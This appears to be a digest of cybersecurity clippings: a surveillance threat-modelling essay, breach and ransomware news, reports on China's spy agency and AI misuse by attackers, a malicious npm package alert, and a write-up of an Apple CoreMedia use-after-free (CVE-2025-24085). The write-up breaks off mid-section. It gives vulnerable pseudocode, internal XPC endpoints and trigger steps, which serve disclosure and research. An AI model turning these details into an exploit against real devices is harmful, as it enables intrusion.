The government has vast capabilities for targeted surveillance, both technically and legally. If a high-level figure is targeted by name, it is almost certain that the government can access their data. The government will use its investigatory powers to the fullest: It will go through government data, remotely hack phones and computers, spy on communications, and raid a home. It will compel third parties, like banks, cell providers, email providers, cloud storage services, and social media companies, to turn over data. To the extent those companies keep backups, the government will even be able to obtain deleted data.

This data can be used for prosecution—possibly selectively. This has been made evident in recent weeks, as the Trump administration personally targeted perceived enemies for “mortgage fraud.” This was a clear example of weaponization of data. Given all the data the government requires people to divulge, there will be something there to prosecute.

Although alarming, this sort of targeted attack doesn’t scale. As vast as the government’s information is and as powerful as its capabilities are, they are not infinite. They can be deployed against only a limited number of people. And most people will never be that high on the priorities list.

The Risks of Mass Surveillance
Mass surveillance is surveillance without specific targets. For most people, this is where the primary risks lie. Even if we’re not targeted by name, personal data could raise red flags, drawing unwanted scrutiny.

The risks here are twofold. First, mass surveillance could be used to single out people to harass or arrest: when they cross the border, show up at immigration hearings, attend a protest, are stopped by the police for speeding, or just as they’re living their normal lives. Second, mass surveillance could be used to threaten or blackmail. In the first case, the government is using that database to find a plausible excuse for its actions. In the second, it is looking for an actual infraction that it could selectively prosecute—or not.

Mitigating these risks is difficult, because it would require not interacting with either the government or corporations in everyday life—and living in the woods without any electronics isn’t realistic for most of us. Additionally, this strategy protects only future information; it does nothing to protect the information generated in the past. That said, going back and scrubbing social media accounts and cloud storage does have some value. Whether it’s right for you depends on your personal situation.

Opportunistic Use of Data
Beyond data given to third parties—either corporations or the government—there is also data users keep in their possession.This data may be stored on personal devices such as computers and phones or, more likely today, in some cloud service and accessible from those devices. Here, the risks are different: Some authority could confiscate your device and look through it.

This is not just speculative. There are many stories of ICE agents examining people’s phones and computers when they attempt to enter the U.S.: their emails, contact lists, documents, photos, browser history, and social media posts.

There are several different defenses you can deploy, presented from least to most extreme. First, you can scrub devices of potentially incriminating information, either as a matter of course or before entering a higher-risk situation. Second, you could consider deleting—even temporarily—social media and other apps so that someone with access to a device doesn’t get access to those accounts—this includes your contacts list. If a phone is swept up in a government raid, your contacts become their next targets.

Third, you could choose not to carry your device with you at all, opting instead for a burner phone without contacts, email access, and accounts, or go electronics-free entirely. This may sound extreme—and getting it right is hard—but I know many people today who have stripped-down computers and sanitized phones for international travel. At the same time, there are also stories of people being denied entry to the U.S. because they are carrying what is obviously a burner phone—or no phone at all.

Encryption Isn’t a Magic Bullet—But Use It Anyway
Encryption protects your data while it’s not being used, and your devices when they’re turned off. This doesn’t help if a border agent forces you to turn on your phone and computer. And it doesn’t protect metadata, which needs to be unencrypted for the system to function. This metadata can be extremely valuable. For example, Signal, WhatsApp, and iMessage all encrypt the contents of your text messages—the data—but information about who you are texting and when must remain unencrypted.

Also, if the NSA wants access to someone’s phone, it can get it. Encryption is no help against that sort of sophisticated targeted attack. But, again, most of us aren’t that important and even the NSA can target only so many people. What encryption safeguards against is mass surveillance.

I recommend Signal for text messages above all other apps. But if you are in a country where having Signal on a device is in itself incriminating, then use WhatsApp. Signal is better, but everyone has WhatsApp installed on their phones, so it doesn’t raise the same suspicion. Also, it’s a no-brainer to turn on your computer’s built-in encryption: BitLocker for Windows and FileVault for Macs.

On the subject of data and metadata, it’s worth noting that data poisoning doesn’t help nearly as much as you might think. That is, it doesn’t do much good to add hundreds of random strangers to an address book or bogus internet searches to a browser history to hide the real ones. Modern analysis tools can see through all of that.

Shifting Risks of Decentralization
This notion of individual targeting, and the inability of the government to do that at scale, starts to fail as the authoritarian system becomes more decentralized. After all, if repression comes from the top, it affects only senior government officials and people who people in power personally dislike. If it comes from the bottom, it affects everybody. But decentralization looks much like the events playing out with ICE harassing, detaining, and disappearing people—everyone has to fear it.

This can go much further. Imagine there is a government official assigned to your neighborhood, or your block, or your apartment building. It’s worth that person’s time to scrutinize everybody’s social media posts, email, and chat logs. For anyone in that situation, limiting what you do online is the only defense.

Being Innocent Won’t Protect You
This is vital to understand. Surveillance systems and sorting algorithms make mistakes. This is apparent in the fact that we are routinely served advertisements for products that don’t interest us at all. Those mistakes are relatively harmless—who cares about a poorly targeted ad?—but a similar mistake at an immigration hearing can get someone deported.

An authoritarian government doesn’t care. Mistakes are a feature and not a bug of authoritarian surveillance. If ICE targets only people it can go after legally, then everyone knows whether or not they need to fear ICE. If ICE occasionally makes mistakes by arresting Americans and deporting innocents, then everyone has to fear it. This is by design.

Effective Opposition Requires Being Online
For most people, phones are an essential part of daily life. If you leave yours at home when you attend a protest, you won’t be able to film police violence. Or coordinate with your friends and figure out where to meet. Or use a navigation app to get to the protest in the first place.

Threat modeling is all about trade-offs. Understanding yours depends not only on the technology and its capabilities but also on your personal goals. Are you trying to keep your head down and survive—or get out? Are you wanting to protest legally? Are you doing more, maybe throwing sand into the gears of an authoritarian government, or even engaging in active resistance? The more you are doing, the more technology you need—and the more technology will be used against you. There are no simple answers, only choices.

Red Hat confirms security incident after hackers claim GitHub breach

bleepingcomputer.com By Lawrence Abrams
October 2, 2025 02:15 AM 0

An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.

An extortion group calling itself the Crimson Collective claims to have breached Red Hat's private GitHub repositories, stealing nearly 570GB of compressed data across 28,000 internal projects.

This data allegedly includes approximately 800 Customer Engagement Reports (CERs), which can contain sensitive information about a customer's network and platforms.

A CER is a consulting document prepared for clients that often contains infrastructure details, configuration data, authentication tokens, and other information that could be abused to breach customer networks.

Red Hat confirmed that it suffered a security incident related to its consulting business, but would not verify any of the attacker's claims regarding the stolen GitHub repositories and customer CERs.

"Red Hat is aware of reports regarding a security incident related to our consulting business and we have initiated necessary remediation steps," Red Hat told BleepingComputer.

"The security and integrity of our systems and the data entrusted to us are our highest priority. At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain."

While Red Hat did not respond to any further questions about the breach, the hackers told BleepingComputer that the intrusion occurred approximately two weeks ago.

They allegedly found authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure.

The hacking group also published a complete directory listing of the allegedly stolen GitHub repositories and a list of CERs from 2020 through 2025 on Telegram.

The directory listing of CERs include a wide range of sectors and well known organizations such as Bank of America, T-Mobile, AT&T, Fidelity, Kaiser, Mayo Clinic, Walmart, Costco, the U.S. Navy’s Naval Surface Warfare Center, Federal Aviation Administration, the House of Representatives, and many others.

The hackers stated that they attempted to contact Red Hat with an extortion demand but received no response other than a templated reply instructing them to submit a vulnerability report to their security team.

According to them, the created ticket was repeatedly assigned to additional people, including Red Hat's legal and security staff members.

BleepingComputer sent Red Hat additional questions, and we will update this story if we receive more information.

The same group also claimed responsibility for briefly defacing Nintendo’s topic page last week to include contact information and links to their Telegram channel

Cyberincident bugnard.ch

Message officiel – Bugnard SA bugnard.ch

Chers clients, chers partenaires,

Le 24 septembre 2025 en fin de journée, nous avons détecté une intrusion dans l'infrastructure informatique de Bugnard SA par le ransomware Akira. Cette attaque a affecté nos serveurs ainsi que notre site internet.
Par mesure de sécurité, nous avons immédiatement interrompu l’accès à la plateforme afin de protéger l’intégrité de vos données et de nos systèmes.
Notre équipe informatique est mobilisée sur place et travaille avec la plus haute priorité pour rétablir la situation. Si nécessaire, nous restaurerons notre dernier backup afin de remettre le site en service dans les plus brefs délais.
À ce stade, nous estimons que la remise en ligne pourra intervenir entre mercredi et vendredi de cette semaine.
Nous sommes pleinement conscients que 72% de notre activité passe par notre site et faisons tout pour que vous puissiez à nouveau passer vos commandes rapidement et en toute sécurité.
En attendant, notre équipe commerciale reste à votre disposition par téléphone et par e-mail pour répondre à vos besoins urgents.
Nous vous tiendrons informés de l’évolution de la situation et vous remercions pour votre compréhension et votre confiance.

Avec mes salutations les meilleures,
Christian Degouy
CEO

Microsoft’s new Security Store is like an app store for cybersecurity | The Verge

Cybersecurity workers can also start creating their own Security Copilot AI agents.

Microsoft is launching a Security Store that will be full of security software-as-a-service (SaaS) solutions and AI agents. It’s part of a broader effort to sell Microsoft’s Sentinel security platform to businesses, complete with Microsoft Security Copilot AI agents that can be built by security teams to help tackle the latest threats.

The Microsoft Security Store is a storefront designed for security professionals to buy and deploy SaaS solutions and AI agents from Microsoft’s ecosystem partners. Darktrace, Illumio, Netskope, Perfomanta, and Tanium are all part of the new store, with solutions covering threat protection, identity and device management, and more.

A lot of the solutions will integrate with Microsoft Defender, Sentinel, Entra, Purview, or Security Copilot, making them quick to onboard for businesses that are fully reliant on Microsoft for their security needs. This should cut down on procurement and onboarding times, too.

Alongside the Security Store, Microsoft is also allowing Security Copilot users to build their own AI agents. Microsoft launched some of its own security AI agents earlier this year, and now security teams can use a tool that’s similar to Copilot Studio to build their own. You simply create an AI agent through a set of prompts and then publish them all with no code required. These Security Copilot agents will also be available in the Security Store today.

How China’s Secretive Spy Agency Became a Cyber Powerhouse

nytimes.com
By Chris Buckley and Adam Goldman
Sept. 28, 2025

Fears of U.S. surveillance drove Xi Jinping, China’s leader, to elevate the agency and put it at the center of his cyber ambitions.

American officials were alarmed in 2023 when they discovered that Chinese state-controlled hackers had infiltrated critical U.S. infrastructure with malicious code that could wreck power grids, communications systems and water supplies. The threat was serious enough that William J. Burns, the director of the C.I.A., made a secret trip to Beijing to confront his Chinese counterpart.

He warned China’s minister of state security that there would be “serious consequences” for Beijing if it unleashed the malware. The tone of the meeting, details of which have not been previously reported, was professional and it appeared the message was delivered.

But since that meeting, which was described by two former U.S. officials, China’s intrusions have only escalated. (The former officials spoke on the condition of anonymity because they were not authorized to speak publicly about the sensitive meeting.)

American and European officials say China’s Ministry of State Security, the civilian spy agency often called the M.S.S., in particular, has emerged as the driving force behind China’s most sophisticated cyber operations.

In recent disclosures, officials revealed another immense, yearslong intrusion by hackers who have been collectively called Salt Typhoon, one that may have stolen information about nearly every American and targeted dozens of other countries. Some countries hit by Salt Typhoon warned in an unusual statement that the data stolen could provide Chinese intelligence services with the capability to “identify and track their targets’ communications and movements around the world.”

The attack underscored how the Ministry of State Security has evolved into a formidable cyberespionage agency capable of audacious operations that can evade detection for years, experts said.

For decades, China has used for-hire hackers to break into computer networks and systems. These operatives sometimes mixed espionage with commercial data theft or were sloppy, exposing their presence. In the recent operation by Salt Typhoon, however, intruders linked to the M.S.S. found weaknesses in systems, burrowed into networks, spirited out data, hopped between compromised systems and erased traces of their presence.
“Salt Typhoon shows a highly skilled and strategic side to M.S.S. cyber operations that has been missed with the attention on lower-quality contract hackers,” said Alex Joske, the author of a book on the ministry.

For Washington, the implication of China’s growing capability is clear: In a future conflict, China could put U.S. communications, power and infrastructure at risk.

China’s biggest hacking campaigns have been “strategic operations” intended to intimidate and deter rivals, said Nigel Inkster, a senior adviser for cybersecurity and China at the International Institute for Strategic Studies in London.

“If they succeed in remaining on these networks undiscovered, that potentially gives them a significant advantage in the event of a crisis,” said Mr. Inkster, formerly director of operations and intelligence in the British Secret Intelligence Service, MI6. “If their presence is — as it has been — discovered, it still exercises a very significant deterrent effect; as in, ‘Look what we could do to you if we wanted.’”

The Rise of the M.S.S.
China’s cyber advances reflect decades of investment to try to match, and eventually rival, the U.S. National Security Agency and Britain’s Government Communications Headquarters, or GCHQ.

China’s leaders founded the Ministry of State Security in 1983 mainly to track dissidents and perceived foes of Communist Party rule. The ministry engaged in online espionage but was long overshadowed by the Chinese military, which ran extensive cyberspying operations.

After taking power as China’s top leader in 2012, Xi Jinping moved quickly to reshape the M.S.S. He seemed unsettled by the threat of U.S. surveillance to China’s security, and in a 2013 speech pointed to the revelations of Edward J. Snowden, the former U.S. intelligence contractor.

Mr. Xi purged the ministry of senior officials accused of corruption and disloyalty. He reined in the hacking role of the Chinese military, elevating the ministry as the country’s primary cyberespionage agency. He put national security at the core of his agenda with new laws and by establishing a new commission.

“At this same time, the intelligence requirements imposed on the security apparatus start to multiply, because Xi wanted to do more things abroad and at home,” said Matthew Brazil, a senior analyst at BluePath Labs who has co-written a history of China’s espionage services.

Since around 2015, the M.S.S. has moved to bring its far-flung provincial offices under tighter central control, said experts. Chen Yixin, the current minister, has demanded that local state security offices follow Beijing’s orders without delay. Security officials, he said on a recent inspection of the northeast, must be both “red and expert” — absolutely loyal to the party while also adept in technology.

“It all essentially means that the Ministry of State Security now sits atop a system in which it can move its pieces all around the chessboard,” said Edward Schwarck, a researcher at the University of Oxford who is writing a dissertation on China’s state security.

Mr. Chen was the official who met with Mr. Burns in May 2023. He gave nothing away when confronted with the details of the cyber campaign, telling Mr. Burns he would let his superiors know about the U.S. concerns, the former officials said.

The Architect of China’s Cyber Power
The Ministry of State Security operates largely in the shadows, its officials rarely seen or named in public. There was one exception: Wu Shizhong, who was a senior official in Bureau 13, the “technical reconnaissance” arm of the ministry.

Mr. Wu was unusually visible, turning up at meetings and conferences in his other role as director of the China Information Technology Security Evaluation Center. Officially, the center vets digital software and hardware for security vulnerabilities before it can be used in China. Unofficially, foreign officials and experts say, the center comes under the control of the M.S.S. and provided a direct pipeline of information about vulnerabilities and hacking talent.

Mr. Wu has not publicly said he served in the security ministry, but a Chinese university website in 2005 described him as a state security bureau head in a notice about a meeting, and investigations by Crowd Strike and other cybersecurity firms have also described his state security role.

“Wu Shizhong is widely recognized as a leading figure in the creation of M.S.S. cyber capabilities,” said Mr. Joske.

In 2013, Mr. Wu pointed to two lessons for China: Mr. Snowden’s disclosures about American surveillance and the use by the United States of a virus to sabotage Iran’s nuclear facilities. “The core of cyber offense and defense capabilities is technical prowess,” he said, stressing the need to control technologies and exploit their weaknesses. China, he added, should create “a national cyber offense and defense apparatus.”

China’s commercial tech sector boomed in the years that followed, and state security officials learned how to put domestic companies and contractors to work, spotting and exploiting flaws and weak spots in computer systems, several cybersecurity experts said. The U.S. National Security Agency has also hoarded knowledge of software flaws for its own use. But China has an added advantage: It can tap its own tech companies to feed information to the state.
“M.S.S. was successful at improving the talent pipeline and the volume of good offensive hackers they could contract to,” said Dakota Cary, a researcher who focuses on China’s efforts to develop its hacking capabilities at SentinelOne. “This gives them a significant pipeline for offensive tools.”

The Chinese government also imposed rules requiring that any newly found software vulnerabilities be reported first to a database that analysts say is operated by the M.S.S., giving security officials early access. Other policies reward tech firms with payments if they meet monthly quotas of finding flaws in computer systems and submitting them to the state security-controlled database.

“It’s a prestige thing and it’s good for a company’s reputation,” Mei Danowski, the co-founder of Natto Thoughts, a company that advises clients on cyber threats, said of the arrangement. “These business people don’t feel like they are doing something wrong. They feel like they are doing something for their country.”

Jaguar Land Rover Gets Government Loan Guarantee to Support Supply Chain; Restarts Production

The Wall Street Journal
By
Dominic Chopping
Follow
Updated Sept. 29, 2025 6:39 am ET

Jaguar Land Rover discovered a cyberattack late last month, forcing the company to shut down its computer systems and halt production.

Jaguar Land Rover will restart some sections of its manufacturing operations in the coming days, as it begins its recovery from a cyberattack that has crippled production for around a month.

“As the controlled, phased restart of our operations continues, we are taking further steps towards our recovery and the return to manufacture of our world‑class vehicles,” the company said in a statement Monday.

The news comes a day after the U.K. government stepped in to provide financial support for the company, underwriting a 1.5 billion-pound ($2.01 billion) loan guarantee in a bid to support the company’s cash reserves and help it pay suppliers.

The loan will be provided by a commercial bank and is backed by the government’s export credit agency. It will be paid back over five years.

“Jaguar Land Rover is an iconic British company which employs tens of thousands of people,” U.K. Treasury Chief Rachel Reeves said in a statement Sunday.

“Today we are protecting thousands of those jobs with up to 1.5 billion pounds in additional private finance, helping them support their supply chain and protect a vital part of the British car industry,” she added.

The U.K. automaker, owned by India’s Tata Motors, discovered a cyberattack late last month, forcing the company to shut down its computer systems and halt production.

The company behind Land Rover, Jaguar and Range Rover models, has been forced to repeatedly extend the production shutdown over the past few weeks as it races to restart systems safely with the help of cybersecurity experts flown in from around the globe, the U.K.’s National Cyber Security Centre and law enforcement.

Last week, the company began a gradual restart of its operations, bringing some IT systems back online. It has informed suppliers and retail partners that sections of its digital network is back up and running, and processing capacity for invoicing has been increased as it works to quickly clear the backlog of payments to suppliers.

JLR has U.K. plants in Solihull and Wolverhampton in the West Midlands, in addition to Halewood in Merseyside. It is one of the U.K.’s largest exporters and a major employer, employing 34,000 directly in its U.K. operations. It also operates the largest supply chain in the U.K. automotive sector, much of it made up of small- and medium-sized enterprises, and employing around 120,000 people, according to the government.

Labor unions had warned that thousands of jobs in the JLR supply chain were at risk due to the disruption and had urged the government to step in with a furlough plan to support them.

U.K. trade union Unite, which represents thousands of workers employed at JLR and throughout its supply chain, said the government’s loan guarantee is an important first step.

“The money provided must now be used to ensure job guarantees and to also protect skills and pay in JLR and its supply chain,” Unite general secretary Sharon Graham said in a statement.

AI for Cyber Defenders

red.anthropic.com September 29, 2025 ANTHROPIC

AI models are now useful for cybersecurity tasks in practice, not just theory. As research and experience demonstrated the utility of frontier AI as a tool for cyber attackers, we invested in improving Claude’s ability to help defenders detect, analyze, and remediate vulnerabilities in code and deployed systems. This work allowed Claude Sonnet 4.5 to match or eclipse Opus 4.1, our frontier model released only two months prior, in discovering code vulnerabilities and other cyber skills. Adopting and experimenting with AI will be key for defenders to keep pace.

We believe we are now at an inflection point for AI’s impact on cybersecurity.

For several years, our team has carefully tracked the cybersecurity-relevant capabilities of AI models. Initially, we found models to be not particularly powerful for advanced and meaningful capabilities. However, over the past year or so, we’ve noticed a shift. For example:

We showed that models could reproduce one of the costliest cyberattacks in history—the 2017 Equifax breach—in simulation.
We entered Claude into cybersecurity competitions, and it outperformed human teams in some cases.
Claude has helped us discover vulnerabilities in our own code and fix them before release.
In this summer’s DARPA AI Cyber Challenge, teams used LLMs (including Claude) to build “cyber reasoning systems” that examined millions of lines of code for vulnerabilities to patch. In addition to inserted vulnerabilities, teams found (and sometimes patched) previously undiscovered, non-synthetic vulnerabilities. Beyond a competition setting, other frontier labs now apply models to discover and report novel vulnerabilities.

At the same time, as part of our Safeguards work, we have found and disrupted threat actors on our own platform who leveraged AI to scale their operations. Our Safeguards team recently discovered (and disrupted) a case of “vibe hacking,” in which a cybercriminal used Claude to build a large-scale data extortion scheme that previously would have required an entire team of people. Safeguards has also detected and countered Claude's use in increasingly complex espionage operations, including the targeting of critical telecommunications infrastructure, by an actor that demonstrated characteristics consistent with Chinese APT operations.

All of these lines of evidence lead us to think we are at an important inflection point in the cyber ecosystem, and progress from here could become quite fast or usage could grow quite quickly.

Therefore, now is an important moment to accelerate defensive use of AI to secure code and infrastructure. We should not cede the cyber advantage derived from AI to attackers and criminals. While we will continue to invest in detecting and disrupting malicious attackers, we think the most scalable solution is to build AI systems that empower those safeguarding our digital environments—like security teams protecting businesses and governments, cybersecurity researchers, and maintainers of critical open-source software.

In the run-up to the release of Claude Sonnet 4.5, we started to do just that.

Claude Sonnet 4.5: emphasizing cyber skills
As LLMs scale in size, “emergent abilities”—skills that were not evident in smaller models and were not necessarily an explicit target of model training—appear. Indeed, Claude’s abilities to execute cybersecurity tasks like finding and exploiting software vulnerabilities in Capture-the-Flag (CTF) challenges have been byproducts of developing generally useful AI assistants.

But we don’t want to rely on general model progress alone to better equip defenders. Because of the urgency of this moment in the evolution of AI and cybersecurity, we dedicated researchers to making Claude better at key skills like code vulnerability discovery and patching.

The results of this work are reflected in Claude Sonnet 4.5. It is comparable or superior to Claude Opus 4.1 in many aspects of cybersecurity while also being less expensive and faster.

Evidence from evaluations
In building Sonnet 4.5, we had a small research team focus on enhancing Claude’s ability to find vulnerabilities in codebases, patch them, and test for weaknesses in simulated deployed security infrastructure. We chose these because they reflect important tasks for defensive actors. We deliberately avoided enhancements that clearly favor offensive work—such as advanced exploitation or writing malware. We hope to enable models to find insecure code before deployment and to find and fix vulnerabilities in deployed code. There are, of course, many more critical security tasks we did not focus on; at the end of this post, we elaborate on future directions.

To test the effects of our research, we ran industry-standard evaluations of our models. These enable clear comparisons across models, measure the speed of AI progress, and—especially in the case of novel, externally developed evaluations—provide a good metric to ensure that we are not simply teaching to our own tests.

As we ran these evaluations, one thing that stood out was the importance of running them many times. Even if it is computationally expensive for a large set of evaluation tasks, it better captures the behavior of a motivated attacker or defender on any particular real-world problem. Doing so reveals impressive performance not only from Claude Sonnet 4.5, but also from models several generations older.

Cybench
One of the evaluations we have tracked for over a year is Cybench, a benchmark drawn from CTF competition challenges.[1] On this evaluation, we see striking improvement from Claude Sonnet 4.5, not just over Claude Sonnet 4, but even over Claude Opus 4 and 4.1 models. Perhaps most striking, Sonnet 4.5 achieves a higher probability of success given one attempt per task than Opus 4.1 when given ten attempts per task. The challenges that are part of this evaluation reflect somewhat complex, long-duration workflows. For example, one challenge involved analyzing network traffic, extracting malware from that traffic, and decompiling and decrypting the malware. We estimate that this would have taken a skilled human at least an hour, and possibly much longer; Claude took 38 minutes to solve it.

When we give Claude Sonnet 4.5 ten attempts at the Cybench evaluation, it succeeds on 76.5% of the challenges. This is particularly noteworthy because we have doubled this success rate in just the past six months (Sonnet 3.7, released in February 2025, had only a 35.9% success rate when given ten trials).

Figure 1: Model Performance on Cybench—Claude Sonnet 4.5 significantly outperforms all previous models given k=1, 10, or 30 trials, where probability of success is measured as the expectation over the proportion of problems where at least one of k trials succeeds. Note that these results are on a subset of 37 of the 40 original Cybench problems, where 3 problems were excluded due to implementation difficulties.
CyberGym
In another external evaluation, we evaluated Claude Sonnet 4.5 on CyberGym, a benchmark that evaluates the ability of agents to (1) find (previously-discovered) vulnerabilities in real open-source software projects given a high-level description of the weakness, and (2) discover new (previously-undiscovered) vulnerabilities.[2] The CyberGym team previously found that Claude Sonnet 4 was the strongest model on their public leaderboard.

Claude Sonnet 4.5 scores significantly better than either Claude Sonnet 4 or Claude Opus 4. When using the same cost constraints as the public CyberGym leaderboard (i.e., a limit of $2 of API queries per vulnerability) we find that Sonnet 4.5 achieves a new state-of-the-art score of 28.9%. But true attackers are rarely limited in this way: they can attempt many attacks, for far more than $2 per trial. When we remove these constraints and give Claude 30 trials per task, we find that Sonnet 4.5 reproduces vulnerabilities in 66.7% of programs. And although the relative price of this approach is higher, the absolute cost—about $45 to try one task 30 times—remains quite low.

Figure 2: Model Performance on CyberGym—Sonnet 4.5 outperforms all previous models, including Opus 4.1.

*Note that Opus 4.1, given its higher price, did not follow the same $2 cost constraint as the other models in the one-trial scenario.

Equally interesting is the rate at which Claude Sonnet 4.5 discovers new vulnerabilities. While the CyberGym leaderboard shows that Claude Sonnet 4 only discovers vulnerabilities in about 2% of targets, Sonnet 4.5 discovers new vulnerabilities in 5% of cases. By repeating the trial 30 times it discovers new vulnerabilities in over 33% of projects.

Figure 3: Model Performance on CyberGym—Sonnet 4.5 outperforms Sonnet 4 at new vulnerablity discovery with only one trial and dramatically outstrips its performance when given 30 trials.
Further research into patching
We are also conducting preliminary research into Claude's ability to generate and review patches that fix vulnerabilities. Patching vulnerabilities is a harder task than finding them because the model has to make surgical changes that remove the vulnerability without altering the original functionality. Without guidance or specifications, the model has to infer this intended functionality from the code base.

In our experiment we tasked Claude Sonnet 4.5 with patching vulnerabilities in the CyberGym evaluation set based on a description of the vulnerability and information about what the program was doing when it crashed. We used Claude to judge its own work, asking it to grade the submitted patches by comparing them to human-authored reference patches. 15% of the Claude-generated patches were judged to be semantically equivalent to the human-generated patches. However, this comparison-based approach has an important limitation: because vulnerabilities can often be fixed in multiple valid ways, patches that differ from the reference may still be correct, leading to false negatives in our evaluation.

We manually analyzed a sample of the highest-scoring patches and found them to be functionally identical to reference patches that have been merged into the open-source software on which the CyberGym evaluation is based. This work reveals a pattern consistent with our broader findings: Claude develops cyber-related skills as it generally improves. Our preliminary results suggest that patch generation—like vulnerability discovery before it—is an emergent capability that could be enhanced with focused research. Our next step is to systematically address the challenges we've identified to make Claude a reliable patch author and reviewer.

Conferring with trusted partners
Real world defensive security is more complicated in practice than our evaluations can capture. We’ve consistently found that real problems are more complex, challenges are harder, and implementation details matter a lot. Therefore, we feel it is important to work with the organizations actually using AI for defense to get feedback on how our research could accelerate them. In the lead-up to Sonnet 4.5 we worked with a number of organizations who applied the model to their real challenges in areas like vulnerability remediation, testing network security, and threat analysis.

Nidhi Aggarwal, Chief Product Officer of HackerOne, said, “Claude Sonnet 4.5 reduced average vulnerability intake time for our Hai security agents by 44% while improving accuracy by 25%, helping us reduce risk for businesses with confidence.” According to Sven Krasser, Senior Vice President for Data Science and Chief Scientist at CrowdStrike, “Claude shows strong promise for red teaming—generating creative attack scenarios that accelerate how we study attacker tradecraft. These insights strengthen our defenses across endpoints, identity, cloud, data, SaaS, and AI workloads.”

These testimonials made us more confident in the potential for applied, defensive work with Claude.

What’s next?
Claude Sonnet 4.5 represents a meaningful improvement, but we know that many of its capabilities are nascent and do not yet match those of security professionals and established processes. We will keep working to improve the defense-relevant capabilities of our models and enhance the threat intelligence and mitigations that safeguard our platforms. In fact, we have already been using results of our investigations and evaluations to continually refine our ability to catch misuse of our models for harmful cyber behavior. This includes using techniques like organization-level summarization to understand the bigger picture beyond just a singular prompt and completion; this helps disaggregate dual-use behavior from nefarious behavior, particularly for the most damaging use-cases involving large scale automated activity.

But we believe that now is the time for as many organizations as possible to start experimenting with how AI can improve their security posture and build the evaluations to assess those gains. Automated security reviews in Claude Code show how AI can be integrated into the CI/CD pipeline. We would specifically like to enable researchers and teams to experiment with applying models in areas like Security Operations Center (SOC) automation, Security Information and Event Management (SIEM) analysis, secure network engineering, or active defense. We would like to see and use more evaluations for defensive capabilities as part of the growing third-party ecosystem for model evaluations.

But even building and adopting to advantage defenders is only part of the solution. We also need conversations about making digital infrastructure more resilient and new software secure by design—including with help from frontier AI models. We look forward to these discussions with industry, government, and civil society as we navigate the moment when AI’s impact on cybersecurity transitions from being a future concern to a present-day imperative.

Security Alert: Malicious 'postmark-mcp' npm Package Impersonating Postmark | Postmark

Alert: A malicious npm package named 'postmark-mcp' was impersonating Postmark to steal user emails. Postmark is not affiliated with this fraudulent package.

We recently became aware of a malicious npm package called "postmark-mcp" on npm that was impersonating Postmark and stealing user emails. We want to be crystal clear: Postmark had absolutely nothing to do with this package or the malicious activity.

Here's what happened: A malicious actor created a fake package on npm impersonating our name, built trust over 15 versions, then added a backdoor in version 1.0.16 that secretly BCC’d emails to an external server.

What you should know:

This is not an official Postmark tool. We have not published our Postmark MCP server on npm prior to this incident
We didn't develop, authorize, or have any involvement with the "postmark-mcp" npm package
The legitimate Postmark API and services remain secure and unaffected by this incident
If you've used this fake package:

Remove it immediately from your systems
Check your email logs for any suspicious activity
Consider rotating any credentials that may have been sent via email during the compromise period
This situation highlights why we take our API security and developer trust so seriously. When you integrate with Postmark, you're working directly with our official, documented APIs—not third-party packages that claim to represent us. If you are not sure what official resources are available, you can find them via the links below, which are always available to our customers:

Our official resources:

Official Postmark MCP - Github
API documentation
Official libraries and SDKs
Support channels or email security@activecampaign.com if you have questions

CVE-2025-24085

github.com/b1n4r1b01

This vulnerability has been labeled under the title CoreMedia, which is a gigantic sub-system on Apple platforms. CoreMedia includes multiple public and private frameworks in the shared cache including CoreMedia.framework, AVFoundation.framework, MediaToolbox.framework, etc. All of these work hand in hand and provide users with multiple low level IPC endpoints and high level APIs. There are tons of vulnerabilities labeled as CoreMedia listed on Apple's security advisory website and these vulnerabilities range from sensitive file access to metadata corruption in media files. In fact, iOS 18.3, where this bug was patched lists 3 CVEs under the CoreMedia label but only this one is labeled as an UAF issue so we can use that as a starting point for our research.

After a lot of diffing, I found that this specific vulnerability lies in the Remaker sub-system of MediaToolbox.framework. The vulnerability lies in the improper handling of FigRemakerTrack object.

remaker_AddVideoCompositionTrack(FigRemaker, ..., ...)
{

// Allocates FigRemakerTrack (alias channel)
ret = remakerFamily_createChannel(FigRemaker, 0, 'vide', &FigRemakerTrack);

...

// Links FigRemakerTrack to FigRemaker
ret = remakerFamily_finishVideoCompositionChannel(FigRemaker, ..., ...);

if (ret){
    // Failure path, means FigRemakerTrack is not linked to FigRemaker
    goto exit;
}
else{
    // Success path, means FigRemakerTrack is linked to FigRemaker

    ...

    ret = URLAsset->URLAssetCopyTrackByID(URLAsset, user_controlled_trackID, &outTrack);

    if (ret){
        // Failure path, if we can make URLAssetCopyTrackByID fail we never zero out FigRemakerTrack
        goto exit;  // <-- buggy route
    }
    else{
        // Success path

        FigWriter->FigWriter_SetTrackProperty(FigWriter, FigRemakerTrack.someTrackID, "MediaTimeScale", value);

        FigRemakerTrack = 0;
        goto exit;
    }

}

exit:

// This function will call CFRelease on the FigRemakerTrack
remakerFamily_discardChannel(FigRemaker, FigRemakerTrack);

...

}
By providing an OOB user_controlled_trackID we can force the control flow to take the buggy route where we free the FigRemakerTrack object while FigRemaker still holds a reference to it.

Reaching the vulnerable code
Reaching this vulnerable code was quite tricky, as you need to deal with multiple XPC endpoints. In my original POC I had to use 6 XPC endpoints which were com.apple.coremedia.mediaplaybackd.mutablecomposition.xpc, com.apple.coremedia.mediaplaybackd.sandboxserver.xpc, com.apple.coremedia.mediaplaybackd.customurlloader.xpc, com.apple.coremedia.mediaplaybackd.asset, com.apple.coremedia.mediaplaybackd.remaker.xpc, com.apple.coremedia.mediaplaybackd.formatreader.xpc to trigger the bug but in my final poc I boiled them down to just 3 endpoints. Since I'm not using low level XPC to communicate with the endpoint, this poc would only work on iOS 18 version, my tests were specifically done on iOS 18.2.

To reach this path you need to:

Create a Remaker object
Enqueue the buggy AddVideoComposition request
Start processing the request (this should free the FigRemakerTrack)
???
Profit?
Impact
This bug lets you get code execution in mediaplaybackd. In the provided poc, I am simply double free'ing the FigRemakerTrack by first free'ing it with the bug and then closing the XPC connection to trigger cleanup of the FigRemaker object and thus crashing. Exploiting this kind of CoreFoundation UAF has been made hard since iOS 18 due to changes in the CoreFoundation allocator. But exploiting this bug on iOS 17 should be manageable due to a weaker malloc type implementation, I was very reliably able to place fake objects after the first free on iOS 17.

In-The-Wild angle
